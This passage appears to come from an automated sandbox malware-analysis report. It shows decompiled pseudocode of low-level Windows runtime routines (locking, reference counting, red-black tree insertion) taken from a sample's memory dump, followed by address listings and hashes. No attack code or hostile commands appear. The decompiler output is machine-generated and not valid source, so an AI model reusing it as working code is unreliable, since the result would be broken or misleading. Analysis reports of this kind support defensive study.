								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01754A2C(0x1806e40, 0x1754b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01737D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x16f5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = L0174F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = L0174F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01797016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01732400(_t267 + 0x20);
															}
															L01732400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01742397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01732280(_t134, 0x1808608);
									__eflags =  *0x1806e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										L0172FFB0(_t198, _t241, 0x1808608);
										__eflags = _t253;
										if(_t253 != 0) {
											L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1806e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1808608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01746B90(_t210,  &_v64);
										_t262 =  *0x1808608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0174E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										L017597C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0175006A(0x1808608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1808608);
												E0175B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1806904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1806e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								L0172FFB0(_t198, _t240, 0x1808608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E017500C2(0x1808608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x017420a0
0x017420a8
0x017420ad
0x017420b3
0x017420b8
0x017420c2
0x017420c7
0x017420cb
0x017420d2
0x01742263
0x01742266
0x01785836
0x01785836
0x00000000
0x0174226c
0x0174226c
0x01742270
0x01742274
0x017420e2
0x017420e2
0x017420e6
0x017420ee
0x017857dc
0x017857de
0x017857ec
0x017857ec
0x017857f1
0x017857f3
0x017857f8
0x00000000
0x017857f8
0x017857e0
0x017857e4
0x017857ea
0x00000000
0x00000000
0x00000000
0x017857ea
0x017420f4
0x017420f4
0x017420f8
0x017420f8
0x017420fc
0x01742100
0x01742106
0x01742201
0x01742206
0x0174220b
0x0174220e
0x017422a9
0x017422ac
0x00000000
0x00000000
0x017422b2
0x017422b5
0x01785801
0x01785806
0x00000000
0x00000000
0x01785810
0x01785815
0x01785818
0x00000000
0x00000000
0x0178581e
0x017422bb
0x017422bb
0x01742218
0x01742218
0x0174221c
0x01742220
0x01742222
0x017422c2
0x017422c4
0x017422dc
0x017422dc
0x017422e1
0x00000000
0x00000000
0x00000000
0x017422e7
0x017422c8
0x017422cd
0x017422d3
0x017422d6
0x01785823
0x01785825
0x01785827
0x00000000
0x00000000
0x0178582d
0x00000000
0x0178582d
0x00000000
0x01742228
0x01742228
0x00000000
0x01742228
0x01742222
0x01742214
0x01742214
0x00000000
0x01742114
0x01742114
0x01742114
0x0174211a
0x0174211c
0x01742348
0x0174234d
0x01785840
0x01785845
0x01785848
0x0178584e
0x0178584e
0x01785848
0x01742353
0x01742355
0x01742388
0x01742388
0x01742368
0x0174236a
0x0174236c
0x0174238f
0x00000000
0x0174236e
0x0174236e
0x0174218e
0x0174218e
0x01742191
0x01742195
0x01785a03
0x01785a06
0x01785a0c
0x01785a0f
0x01785a11
0x01785a13
0x01785a13
0x01785a19
0x01785a1f
0x00000000
0x0174219b
0x0174219b
0x017421a0
0x01742282
0x01742284
0x01742284
0x01742284
0x01742284
0x017421a6
0x017421a9
0x017421ac
0x017421ae
0x017421b3
0x0174228b
0x01742290
0x01742379
0x01742296
0x01742298
0x01742298
0x01742290
0x017421b9
0x017421be
0x017422a2
0x017422a2
0x017421c4
0x017421c8
0x017421cc
0x017421d0
0x017421d4
0x017421de
0x017421e3
0x01785a29
0x01785a2c
0x00000000
0x00000000
0x01785a3b
0x00000000
0x017421e9
0x017421e9
0x017421e9
0x017421ee
0x017421f1
0x01785a45
0x01785a4b
0x01785a52
0x01785a58
0x01785a5d
0x01785a5f
0x01785a71
0x01785a61
0x01785a6a
0x01785a6a
0x01785a76
0x01785a79
0x01785a7f
0x01785a83
0x01785a85
0x01785a87
0x01785a87
0x01785a8c
0x01785a91
0x01785a97
0x01785a9f
0x01785aa0
0x01785aa1
0x01785aa6
0x01785aab
0x01785ab1
0x01785ab3
0x01785ab9
0x01785aca
0x01785ad4
0x01785ad4
0x01785ade
0x01785ade
0x01785aab
0x01785a79
0x01785a52
0x017421f7
0x017421f9
0x017421fe
0x017421fe
0x017421e3
0x01742195
0x0174236c
0x01742122
0x01742122
0x01742124
0x01742231
0x01742236
0x01742236
0x01742238
0x01742238
0x01742240
0x01742242
0x01742244
0x017859fc
0x0174218c
0x0174218c
0x00000000
0x0174218c
0x0174224a
0x0174224f
0x01742256
0x01742304
0x01742309
0x0174230f
0x0174231e
0x0174231e
0x0174231e
0x01742320
0x01742325
0x0174232a
0x0174232c
0x0174233e
0x0174233e
0x00000000
0x0174232c
0x01742311
0x01742317
0x0174231a
0x0174231c
0x01742380
0x01742380
0x01742380
0x01742384
0x00000000
0x00000000
0x01742386
0x00000000
0x0174231c
0x0174225c
0x0174225c
0x00000000
0x0174225c
0x0174212a
0x01742134
0x01742138
0x0174213d
0x01785858
0x01785863
0x01785863
0x01785867
0x0178586a
0x00000000
0x00000000
0x0178586c
0x0178586c
0x01785871
0x01785875
0x01785877
0x01785997
0x0178599c
0x017859a1
0x017859a7
0x017859a7
0x00000000
0x017859a7
0x0178587d
0x00000000
0x0178588b
0x0178588b
0x01785890
0x01785892
0x01785894
0x01785899
0x0178589b
0x017858a0
0x017858a0
0x017858aa
0x017858b2
0x017858b6
0x017858be
0x017858c6
0x017858c9
0x0178590d
0x01785917
0x0178591a
0x0178591c
0x01785920
0x01785928
0x0178592a
0x0178592c
0x0178592e
0x0178592e
0x017858cb
0x017858cd
0x017858d8
0x017858e0
0x017858f4
0x017858fe
0x017858fe
0x0178593a
0x0178593e
0x01785940
0x01785942
0x00000000
0x01785944
0x01785944
0x01785949
0x0178594e
0x0178594e
0x01785953
0x0178595b
0x01785976
0x01785976
0x0178597a
0x0178597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01785981
0x01785981
0x01785981
0x01785983
0x01785988
0x0178598d
0x01785991
0x01785991
0x00000000
0x0178595d
0x0178595d
0x01785963
0x01785965
0x00000000
0x00000000
0x00000000
0x00000000
0x01785967
0x01785967
0x0178596b
0x0178596d
0x00000000
0x00000000
0x0178596f
0x01785971
0x01785971
0x01785974
0x00000000
0x00000000
0x00000000
0x01785974
0x00000000
0x01785967
0x0178595b
0x01785942
0x01785863
0x01742143
0x01742143
0x01742149
0x0174214f
0x017422f1
0x017422f6
0x00000000
0x01742173
0x01742173
0x0174217d
0x01742181
0x01742186
0x017859ae
0x017859b2
0x017859b5
0x017859b7
0x017859ba
0x017859cd
0x017859d1
0x017859d5
0x017859d9
0x017859db
0x00000000
0x00000000
0x017859dd
0x017859dd
0x017859e1
0x017859e4
0x017859e7
0x017859ee
0x017859ee
0x017859f3
0x017859f3
0x00000000
0x01742186
0x0174214f
0x01742106
0x01742266
0x017420d8
0x017420da
0x017420e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d90f777f750758c8627282f1fd422c17cbd2be664b58a79ff5852d194d2b673
Instruction ID: 533b723e2d69ecaf28f2086b6728444caa0bfa70e79b109feda6056a90036c00
Opcode Fuzzy Hash: 4d90f777f750758c8627282f1fd422c17cbd2be664b58a79ff5852d194d2b673
Instruction Fuzzy Hash: 62F11331A083419FE726DF2CD84476BFBE1AF85324F05856DF9959B282D734D851CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0172B090 Relevance: .4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0172B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x0172b095
0x0172b09b
0x0172b09f
0x0172b0a5
0x0172b0a7
0x0172b0aa
0x0172b0ad
0x0172b0b1
0x0172b3f8
0x0172b3fa
0x0172b3ff
0x0172b419
0x0172b41b
0x0172b41b
0x0172b401
0x00000000
0x0172b0b7
0x0172b0b9
0x0172b0bc
0x0172b0c0
0x0172b0c2
0x0172b0c2
0x0172b0c4
0x0172b0c8
0x0172b0cf
0x0172b0d1
0x0172b0d1
0x0172b0da
0x0172b0dd
0x0172b0df
0x0172b0df
0x0172b0e4
0x0172b0e9
0x0172b3e2
0x0172b3e5
0x0172b3eb
0x0177a676
0x0177a67b
0x0177a67d
0x0172b3f1
0x0172b3f1
0x0172b3f1
0x0172b0ef
0x0172b0ef
0x0172b0ef
0x0172b0e9
0x0172b0f6
0x0172b28d
0x0172b28e
0x0172b293
0x0172b0fc
0x0172b0fc
0x0172b101
0x0172b104
0x0172b107
0x0172b10c
0x0177a687
0x0177a68d
0x0177a68d
0x0177a687
0x0172b112
0x0172b116
0x0177a696
0x0177a69c
0x0177a69c
0x0177a696
0x0172b120
0x0172b121
0x0172b124
0x0172b127
0x0172b12a
0x0172b12d
0x0172b132
0x0177a6a5
0x00000000
0x00000000
0x0177a6ab
0x00000000
0x0172b138
0x0172b138
0x0172b13a
0x0172b193
0x0172b197
0x0172b19d
0x0172b29c
0x0172b29f
0x0172b2a2
0x0172b2a7
0x0177a6d2
0x0177a6d8
0x0177a6d8
0x0177a6d2
0x0172b2af
0x0172b420
0x0172b422
0x0172b423
0x00000000
0x0172b2b5
0x0172b2b5
0x0172b2ba
0x0177a6e1
0x0177a6e7
0x0177a6e7
0x0177a6e1
0x0172b2c2
0x00000000
0x0172b2c8
0x0172b2cb
0x0172b2d0
0x0177a6f0
0x0177a6f6
0x0177a6f6
0x0177a6f0
0x0172b2d8
0x00000000
0x0172b2de
0x0172b2de
0x0172b2de
0x0172b2e1
0x0172b2e6
0x0172b2eb
0x0177a6ff
0x0177a705
0x0177a705
0x0177a6ff
0x0172b2f3
0x00000000
0x0172b2f9
0x0172b2fb
0x0172b2fd
0x0172b301
0x0172b303
0x0172b303
0x0172b308
0x0172b30b
0x0172b310
0x0172b312
0x0172b312
0x0172b31c
0x0172b322
0x0172b327
0x0177a70e
0x0172b335
0x0172b337
0x0177a71d
0x0177a723
0x0177a723
0x0177a71d
0x0172b340
0x0172b345
0x0172b349
0x0177a72a
0x0177a72a
0x0172b352
0x0172b357
0x0172b359
0x0172b359
0x0172b365
0x0172b367
0x0172b36c
0x00000000
0x0172b36c
0x0177a714
0x0177a714
0x0172b32f
0x0172b3b8
0x0172b3bd
0x0172b3c4
0x0172b425
0x0172b427
0x0172b429
0x0172b429
0x0172b427
0x0172b3c8
0x00000000
0x00000000
0x0172b3ce
0x0172b42f
0x0172b3d0
0x0172b3d0
0x0172b3d0
0x0172b3d7
0x0172b3da
0x0172b3da
0x00000000
0x0172b32f
0x0172b2f3
0x0172b2d8
0x0172b2c2
0x0172b2af
0x0172b1a3
0x0172b1a9
0x0172b1af
0x0172b1b2
0x0172b1b5
0x0172b1b8
0x0177a733
0x0177a739
0x0177a739
0x0177a733
0x0172b1c0
0x00000000
0x0172b1c6
0x0172b1c8
0x0172b1cb
0x0172b1ce
0x0172b1d3
0x0177a742
0x0177a748
0x0177a748
0x0177a742
0x0172b1db
0x00000000
0x0172b1e1
0x0172b1e1
0x0172b1e6
0x0172b1e9
0x0172b1ee
0x0177a751
0x0172b409
0x0172b409
0x0172b40e
0x00000000
0x00000000
0x0172b410
0x0172b22d
0x0172b22f
0x0177a790
0x0177a796
0x0177a796
0x0177a790
0x0172b23d
0x0172b243
0x0172b248
0x0177a79f
0x00000000
0x00000000
0x0177a7a5
0x00000000
0x0172b24e
0x0172b24e
0x0172b250
0x0172b374
0x0172b379
0x0172b37e
0x0177a7ae
0x0177a7b4
0x0177a7b4
0x0177a7ae
0x0172b386
0x00000000
0x0172b38c
0x0172b38e
0x0177a7bd
0x0172b394
0x0172b394
0x0172b394
0x0172b39b
0x0172b39e
0x00000000
0x0172b39e
0x0172b386
0x0172b256
0x0172b258
0x0177a7c6
0x0177a7cc
0x0177a7cc
0x0177a7c6
0x0172b261
0x0172b266
0x0172b26a
0x0177a7d3
0x0177a7d3
0x0172b273
0x0172b278
0x0172b27a
0x0172b27a
0x0172b281
0x0172b283
0x0172b285
0x0172b287
0x0172b289
0x00000000
0x0172b289
0x0172b248
0x0177a757
0x0177a757
0x0172b1f6
0x00000000
0x00000000
0x0172b1fc
0x0172b201
0x0177a760
0x0177a766
0x0177a766
0x0177a760
0x0172b209
0x0172b3a8
0x0177a76f
0x0172b3ae
0x0172b3ae
0x0172b3ae
0x0172b3b0
0x00000000
0x0172b20f
0x0172b20f
0x0172b213
0x0177a778
0x0177a77e
0x0177a77e
0x0177a778
0x0172b21b
0x00000000
0x0172b221
0x0172b223
0x0177a787
0x0172b229
0x0172b229
0x0172b229
0x0172b22b
0x00000000
0x0172b22b
0x0172b21b
0x0172b209
0x0172b1db
0x0172b142
0x0172b142
0x0172b146
0x0172b148
0x0172b14c
0x0172b14f
0x0172b154
0x0172b15b
0x0177a6b4
0x00000000
0x00000000
0x0177a6ba
0x0177a6ba
0x0172b163
0x00000000
0x00000000
0x00000000
0x0172b163
0x0172b13a
0x0172b169
0x0172b16b
0x0172b16e
0x0172b171
0x0172b175
0x0172b178
0x0177a6c3
0x0177a6c9
0x0177a6c9
0x0177a6c3
0x0172b180
0x0172b184
0x00000000
0x0172b104
0x0172b0f6

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
